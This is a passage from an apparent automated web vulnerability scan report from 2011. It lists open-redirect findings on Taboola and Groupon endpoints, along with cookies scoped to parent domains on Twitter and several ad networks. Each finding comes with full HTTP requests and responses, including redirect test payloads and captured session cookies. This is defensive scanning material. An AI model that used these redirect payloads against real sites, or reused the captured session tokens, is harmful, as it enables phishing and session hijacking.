Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304954989; taboola_wv=; taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:37:11 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Cache-Control: no-cache
Pragma: no-cache
Location: http://a905ae88c4b0a573a/a?http://cdn.taboolasyndication.com/pixel.gif
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


9.5. http://trc.taboolasyndication.com/usatoday/log/2/display [url parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/log/2/display

Issue detail

The value of the url request parameter is used to perform an HTTP redirect. The payload http%3a//a4f0f843a2d4f4761/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif was submitted in the url parameter. This caused a redirection to the following URL:

Request

GET /usatoday/log/2/display?ri=21db8aab092294661c05925509bb8015&sd=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415&ui=d80f7856-eeab-487a-988c-f15ce2ff8eb0&pi=46732364&pt=text&li=rbox-t2v&ii=6651343991276886322&it=text-ad&d=9%2Ccr0.worthathousandwords.com&id=9886&url=http%3a//a4f0f843a2d4f4761/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415; taboola_wv=; taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Cache-Control: no-cache
Pragma: no-cache
Location: http://a4f0f843a2d4f4761/a?http://cdn.taboolasyndication.com/pixel.gif
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


9.6. http://trc.taboolasyndication.com/usatoday/log/2/visible [url parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/log/2/visible

Issue detail

The value of the url request parameter is used to perform an HTTP redirect. The payload http%3a//a4032a35ca0f6da7a/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif was submitted in the url parameter. This caused a redirection to the following URL:

Request

GET /usatoday/log/2/visible?ri=21db8aab092294661c05925509bb8015&sd=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415&ui=d80f7856-eeab-487a-988c-f15ce2ff8eb0&pi=46732364&pt=text&li=rbox-t2v&il=4158710290402832976%2C1510865350917446228&id=3432&url=http%3a//a4032a35ca0f6da7a/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415; taboola_wv=; taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:37:15 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Cache-Control: no-cache
Pragma: no-cache
Location: http://a4032a35ca0f6da7a/a?http://cdn.taboolasyndication.com/pixel.gif
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Set-Cookie: taboola_rii=4158710290402832976_1510865350917446228;Path=/usatoday/;Expires=Tue, 08-May-12 15:37:15 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8


9.7. https://www.groupon.com/users [Referer HTTP header]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users

Issue detail

The value of the Referer HTTP header is used to perform an HTTP redirect. The payload .a3f79e46c4377f02c/ was submitted in the Referer HTTP header. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Because the data used in the redirection is submitted within a header, the application's behaviour is unlikely to be directly useful in lending credibility to a phishing attack. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

POST /users HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: .a3f79e46c4377f02c/
Cache-Control: max-age=0
Origin: https://www.groupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55
Content-Length: 231

authenticity_token=ICfp1OvnKSBwXOdEcwa6DN9FNr34UQxyH%2FNwl5Q3Ga4%3D&user%5Bfull_name%5D=&user%5Bemail_address%5D=&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&user%5Baccept_terms%5D=0&user%5Ba
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:59 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: _tpref=.a3f79e46c4377f02c%2F; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:36:59 GMT
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:59 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:59 GMT; HttpOnly
Status: 302
Location: https://www.groupon.com.a3f79e46c4377f02c/
X-Runtime: 72
Cache-Control: no-cache
Content-Length: 108

<html><body>You are being <a href="https://www.groupon.com.a3f79e46c4377f02c/">redirected</a>.</body></html>

10. Cookie scoped to parent domain  previous  next
There are 68 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/wvuefox8/lists/wvue-fox-8-3/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/wvuefox8/lists/wvue-fox-8-3/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1304955538932=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304955581-43234-51315
X-RateLimit-Limit: 150
ETag: "d640a63e6d4c8f178a68be50c58e168a"-gzip
Last-Modified: Mon, 09 May 2011 15:39:41 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04042
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e74652c3d440cadd935e7e0b1675c0679bbdd85f
X-RateLimit-Reset: 1304959140
Set-Cookie: original_referer=ZLhHHTiegr%2FMnOT%2Fp8liqKLpSbkz6bAtT4p5bnOw1ZAfyga3xOTsMg%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFzzadUvAToHaWQiJTM5Yjg2NzFhNGIzMWUw%250AZTAxOGEzYjc2YjE1OWFjZGRkIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2ae163b2825351976cb494802b1d845f55f5087e; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35250

TWTR.Widget.receiveCallback_1([{"text":"http:\/\/t.co\/PZWHmCQ","coordinates":null,"truncated":false,"id_str":"67605941750743040","source":"\u003Ca href=\"http:\/\/twitter.com\/download\/android\" rel
...[SNIP]...

10.2. http://t.mookie1.com/t/v1/imp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850974&migRandom=106464174&migTagDesc=Cingular&migAtlSA=286737327&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:02 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Sat, 02-Jun-12 15:39:02 GMT; domain=.mookie1.com
Set-Cookie: session=1304955542|1304955542; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

10.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-38-58_13277019711304955538; expires=Sat, 07-May-2016 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13277019711304955538; expires=Mon, 09-May-2011 15:53:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

10.4. http://a1.interclick.com/ColDta.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /ColDta.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ColDta.aspx HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/DtCol.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265; ucap=sl=1; FC_51=128531=17622395:1; IFC=n=1&w50020=1&a128531=1&e=634406242967180244; Aqprep_Banner300X250=128531=634405378967210244:50020; Li=1=734265&30=734245; tpd=e20=1305834684215&e90=1305560188038&e50=1305834684416&e100=1305560187993&i100=&i90=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: tpd=e20=1305834684215&e90=1305560188038&e50=1305834684416&e100=1305560187993; domain=.interclick.com; expires=Wed, 08-Jun-2011 15:38:40 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:39 GMT

GIF89a.............!.......,...........D..;

10.5. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=88105499721132220&clkurl=http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAfxzeJwAAAAA./cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU./referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUaGIdSlqXB8gTNDuT_OL7eWkwL7QDA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfI_rNYBSUeAtRkFGYHraycgPpBgMeJgZWZnZ.NkZORg5GbkYuRl5GHkZ.cCSLJmMIkA1SwvAOhTMIIIhTCKMokBh.V1cbMzYtC12ZwQ6B5hcL7nWCoCsZmAAAFGskws-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUVGIL2vn32CiWPiwQj5OTzmIjggADA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqR9VoXJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJBgYmDqXAP3QDDTzF9BMd5iZk_Qj_KFyGP7r5djmDZXDcEsvh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqBxGPHRIuN_GqU_CThuXvvaTOzfh0td.ckYtTrkTwouBYcuIU76yWwgoz.B7XK8BlIoCbzEKMgLT005GfiDFYMDHwMjMyMLEys_GyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XNyoRd42J3RqCjYIkW5AIGAPYfk5A-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:35:18 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3928
Date: Mon, 09 May 2011 15:35:17 GMT

_289669_amg_acamp_id=172249;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...

10.6. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;231082307;55315497;e?http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://share.meebo.com/cim/whitev4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1
Set-Cookie: id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 09 May 2011 15:35:33 GMT
Server: GFE/2.0
Content-Type: text/html


10.7. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1233308J95620110310212114&flash=10&time=1|10:35|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBEgMLqgnITYDyDaXRlQfxr83UCKTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEFmALADLgCGMgC5In4GeACAOoCDjMwMHgyNTBCX01vbmV5kAOkA5gD4AOoAwHoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB%26num%3D1%26sig%3DAGiWqtyodj_3eco2oOZOH11No0LN9ZNq6g%26client%3Dca-pub-6743622525202572%26adurl%3D$CTURL$&r=0.18015406071208417 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=D9A20400-8E82-28EE-0209-AFE0003E0200; PRca=|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; 